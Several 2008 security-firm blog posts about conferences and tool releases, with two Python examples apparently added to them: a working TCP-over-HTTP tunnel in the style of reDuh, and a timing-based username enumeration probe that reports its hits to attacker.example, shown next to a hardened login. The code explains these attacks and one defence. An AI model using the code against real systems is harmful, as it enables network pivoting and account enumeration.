Conferences

HITB08 Slides available..

Slides from the latest Hack in the Box conference [are available] (the SensePost slides are listed as owing / not there yet). SensePosters can grab a local copy [here].

OWASP NYC Talks Posted..

The full videos from the OWASP NYC Conf have been posted. At least one is a BlackHat re-run, but some look well worth watching.. Most people can grab the videos and slide decks [here]; SensePost’ers (except for those actually currently living in NY) can grab selected talks locally [here].

BlackHat/DefCon 2008 – Tool Release(s)

Hey guys.. Our BlackHat/Defcon talk this year featured a few tools that we promised to release.. The first tool, or set of tools, is reDuh, which can be found [here]. reDuh is made up of 2 parts: a local proxy and a server component (which is JSP, PHP or ASP). If you run the local proxy on your machine while pointing it at the server component, you are able to make TCP connections clean through the web server. This comes in surprisingly helpful (and if nothing else is really cute!). You can read more about reDuh (with pretty pictures) by checking out the [reduh page] or by checking out our [Vegas slides].
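To make the two-part design concrete, here is an added example of the same idea in Python. It is not reDuh's own code or wire protocol: the JSON message format, the op names (connect/send/recv/close) and the /reduh path are assumptions made up for this demo. A toy "internal" TCP service, the server component and the local proxy logic all run on loopback so the whole thing is self-contained.

```python
"""reDuh-style TCP-over-HTTP tunnelling (added example, not reDuh's own code).
Roles, all on loopback here:
  * a toy "internal" TCP service the attacker cannot reach directly,
  * the server component (reDuh ships this as a JSP/PHP/ASP page), here a
    Python HTTP handler that holds sockets open on the web server's behalf,
  * the local proxy's core logic, which ferries TCP payloads inside HTTP POSTs.
The JSON message format and op names are assumptions invented for this demo.
"""
import base64
import json
import socket
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

TUNNELS = {}            # tunnel id -> socket kept open by the server component
LOCK = threading.Lock()


class ServerComponent(BaseHTTPRequestHandler):
    """Stand-in for the server-side page: one POST per tunnel operation."""

    def do_POST(self):
        req = json.loads(self.rfile.read(int(self.headers.get("Content-Length", "0"))))
        with LOCK:
            if req["op"] == "connect":      # the web server opens the real TCP socket
                sock = socket.create_connection((req["host"], req["port"]), timeout=2)
                tid = str(len(TUNNELS) + 1)
                TUNNELS[tid] = sock
                resp = {"id": tid}
            elif req["op"] == "send":       # client -> target bytes, base64 in the body
                TUNNELS[req["id"]].sendall(base64.b64decode(req["data"]))
                resp = {"ok": True}
            elif req["op"] == "recv":       # poll: hand back whatever the target sent so far
                sock = TUNNELS[req["id"]]
                sock.settimeout(0.5)
                try:
                    data = sock.recv(4096)
                except socket.timeout:
                    data = b""
                resp = {"data": base64.b64encode(data).decode()}
            else:                           # close
                TUNNELS.pop(req["id"]).close()
                resp = {"ok": True}
        body = json.dumps(resp).encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_internal_service():
    """Toy internal service: answers with the received bytes upper-cased. Returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen()

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                data = conn.recv(4096)
                if data:
                    conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def start_web_server():
    """The web server hosting the server component. Returns the component's URL."""
    httpd = HTTPServer(("127.0.0.1", 0), ServerComponent)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d/reduh" % httpd.server_port


# Ignore any http_proxy environment settings so the demo stays on loopback.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def web_call(url, msg):
    """One HTTP request from the local proxy to the server component."""
    req = urllib.request.Request(url, data=json.dumps(msg).encode(),
                                 headers={"Content-Type": "application/json"})
    with OPENER.open(req, timeout=5) as resp:
        return json.loads(resp.read())


def tunnel_exchange(url, host, port, payload, polls=10):
    """Local-proxy core: open a tunnel, push payload, pull the reply, tear down."""
    tid = web_call(url, {"op": "connect", "host": host, "port": port})["id"]
    web_call(url, {"op": "send", "id": tid, "data": base64.b64encode(payload).decode()})
    reply = b""
    for _ in range(polls):                  # the target answers asynchronously
        chunk = base64.b64decode(web_call(url, {"op": "recv", "id": tid})["data"])
        reply += chunk
        if chunk:
            break
    web_call(url, {"op": "close", "id": tid})
    return reply


def demo():
    """Reach the internal service purely through HTTP requests to the web server."""
    port = start_internal_service()
    url = start_web_server()
    return tunnel_exchange(url, "127.0.0.1", port, b"hello through the web server")
```

Running demo() returns the upper-cased bytes, proving the payload reached the internal service and came back even though the client only ever spoke HTTP to the web server. The real tool adds the piece omitted here for brevity: a listening port on the attacker's machine so that ordinary clients (a browser, an SSH client) can use the tunnel without knowing it exists.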

BlackHat / DefCon 2008….

Hey guys.. Most of our BlackHat/Defcon team has arrived back home in one piece.. I landed with a fever and a lost voice (but to be honest I already caught something while in Vegas!). We will post some post-Vegas thoughts as soon as the dust settles, but I also promised the slides from our talk and the tools we released… A link to the slides is here: [Pushing a Camel through the eye of a Needle]

DefCon 16 – Hmm.. 2 of these talks seem familiar…

Some of the DC16 speaker summaries have been posted, and these 2 caught my eye: “Time-Based Blind SQL Injection using heavy queries” and “New Tool for SQL Injection with DNS Exfiltration”. Both descriptions seem pretty much spot on with what we did in our DefCon talk last year.. hmm.. I wonder if it’s new twists on it, or a little more of the same? /mh

2 Winning quotes..

From the SourceBoston videos I blogged about: Dr Geer never disappoints, and kicked it off with the 4 rules on his office wall: Work like hell, Share all you know, Abide by your handshake, Have fun. If he had mentioned anything about foosball or pool.. I would have sworn blind he was talking about SensePost! The 2nd quote that was awesome (during the interview with the l0pht members) was from Dildog.. ex-l0pht, ex-@stake, now Veracode’s chief scientist.. The discussion turned to “security companies and snake oil”, and the fact that Dildog was a “vendor” again.. With a dry smile that could have been at home in a John Cleese movie, he replies:

2 reasons to visit sourceboston.com (and 2 reasons to rejoice!)

SourceBoston completed its first conference earlier this month, and some of the slide decks and videos are up.. While the image of the young hax0rs indeed brings back fond memories of surfing blackcrawlarch and trying in vain to get Mosaic chat to work in the lounge, it isn’t one of the 2 reasons to rejoice.. Those are: the chance to watch Dr. Dan Geer’s talk (Dr Geer is one of those people who remind you how un-smart you are every time you hear him speak), and, on a mildly unrelated note (for some definition of mild), the fact that all USENIX conference proceedings have been made available freely online.. Rock on!

RE: Sensepost at Cebit 2008

“SensePost have once again been invited to join the South African Department of Trade and Industry at Cebit, as one of 10 SA companies, to exhibit on their pavilion. Visitors to this show range in the region of 500,000 and approximately 5700 exhibitors fill the 27 Halls. Cebit is the biggest information and technology show in Europe and attracts exhibitors and visitors from all over the world.”

HBN Bootcamp @ Black Hat

Black Hat DC this year is supposed to be “a different kind of Black Hat”. There are four tracks over the two days with a special emphasis on wireless, and speakers include Chris Wysopal, FX from Phenoelit, Job de Haas, and Adam Laurie. The smaller shows are always good fun and good value for money, and DC this year promises to have an excellent line-up of speakers. As usual, training courses are offered on the two days before the briefings begin. It’s been a while since we trained at DC, but this year we’re back with a Bootcamp course. The course is filling up nicely, so we’re totally stoked. Like the show, the courses tend to be smaller and more personal, so if you’ve never attended a Hacking By Numbers ‘Bootcamp’ course before then this is a great opportunity. Bootcamp Edition teaches a method-based approach to hacking into networks and systems over the Internet. The method taught consists of seven distinct phases that each have their own objectives, techniques and tools. Students are provided with fully-configured laptop computers that are used stage-for-stage to complete fifteen different technical exercises. You can learn more or enroll here… otherwise contact us via training@sensepost.com if you’d like some more information.

Rob Auger from OWASP/WASC/CGiSecurity on Timing..

Rob had a rant on his site on the timing attack, with a CSRF twist.. We met him after our Vegas talk, but I’m not really sure how his attack differs from our published one.. My on-list response:

-snip-

From: haroon meer
To: bugtraq@cgisecurity.net
Cc: websecurity@webappsec.org
Subject: Re: [WEB SECURITY] Performing Distributed Brute Forcing of CSRF vulnerable login pages

Hi Robert..

Thanks for the kind words on the talk.. If you check out the visio at: http://www.sensepost.com/blogstatic/2007/08/dxsrt.png you will see that it’s pretty much the same attack..

In a shameless display of self-pimpage, check out the paper http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf from page 12.. Figure 23 for example shows the results in a victim/zombie’s browser, after he has visited our page.. Effectively he tries the userlist we send him (in this case on a standard SquirrelMail login page). Once he detects a timing diff (again using a trivial algorithm to avoid latency disparity) he simply makes another request to the attacker to report his success..
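The timing leak that both the DefCon paper and Rob's post build on is easy to reproduce in miniature. The following is an added example in Python, not code from the paper, from Rob's post or from any real login page: leaky_login() is a constructed handler that skips the slow password hash for unknown usernames, so valid names answer measurably slower; probe_usernames() plays the zombie's role in-process (a real zombie would be timing cross-site requests from the victim's browser), using one trivial way to ride out latency disparity, namely repeating each probe and comparing medians against the fastest candidate, which is my choice here and not necessarily the paper's algorithm; report_url() is the final request back to the attacker, with attacker.example as a placeholder host. safe_login() shows the fix. All names, passwords and thresholds are made up.

```python
"""Timing-based username enumeration (added example; constructed login handlers,
not a real application). Valid usernames answer slower from leaky_login()
because the expensive hash only runs for accounts that exist."""
import hashlib
import hmac
import os
import statistics
import time

SALT = os.urandom(16)
ITERATIONS = 150_000            # slow enough that a skipped hash is measurable


def _slow_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, ITERATIONS)


# Constructed user table: only these two accounts exist on the "server".
USERS = {"alice": _slow_hash("correct horse"), "bob": _slow_hash("hunter2")}
_DUMMY = _slow_hash("placeholder")   # hashed against when the user does not exist


def leaky_login(username, password):
    """Vulnerable: unknown users return before the expensive hash runs."""
    stored = USERS.get(username)
    if stored is None:
        return False                 # fast path leaks "no such user"
    return hmac.compare_digest(_slow_hash(password), stored)


def safe_login(username, password):
    """Hardened: always pay the hashing cost, then compare in constant time."""
    stored = USERS.get(username, _DUMMY)
    ok = hmac.compare_digest(_slow_hash(password), stored)
    return ok and username in USERS


def time_login(login, username, samples=3):
    """Median wall-clock time of `samples` failed logins for one username."""
    durations = []
    for _ in range(samples):
        start = time.perf_counter()
        login(username, "not-the-password")
        durations.append(time.perf_counter() - start)
    return statistics.median(durations)


def probe_usernames(login, candidates, samples=3, ratio=5.0, floor=0.005):
    """Return candidates whose median response time stands out from the fastest.

    Two conditions must hold: several times slower than the baseline (survives a
    uniformly slow link) and at least `floor` seconds slower in absolute terms
    (survives jitter on a fast one). Thresholds are assumptions for this demo.
    """
    medians = {name: time_login(login, name, samples) for name in candidates}
    baseline = min(medians.values())
    return sorted(name for name, m in medians.items()
                  if m > ratio * baseline and m - baseline > floor)


def report_url(found, attacker="http://attacker.example/report"):
    """The zombie's last step: one more request, to the attacker, carrying the hits."""
    return attacker + "?users=" + ",".join(found)


if __name__ == "__main__":
    wordlist = ["mallory", "alice", "eve", "bob", "trent"]
    print(report_url(probe_usernames(leaky_login, wordlist)))
    print(probe_usernames(safe_login, wordlist))
```

Against leaky_login() the probe picks out alice and bob from the word list; against safe_login() every name costs one hash, the medians bunch together and nothing is reported. The same median-of-N comparison is what you would run in the victim's browser, with the "login" call replaced by a timed cross-site request and the result sent to the attacker's host.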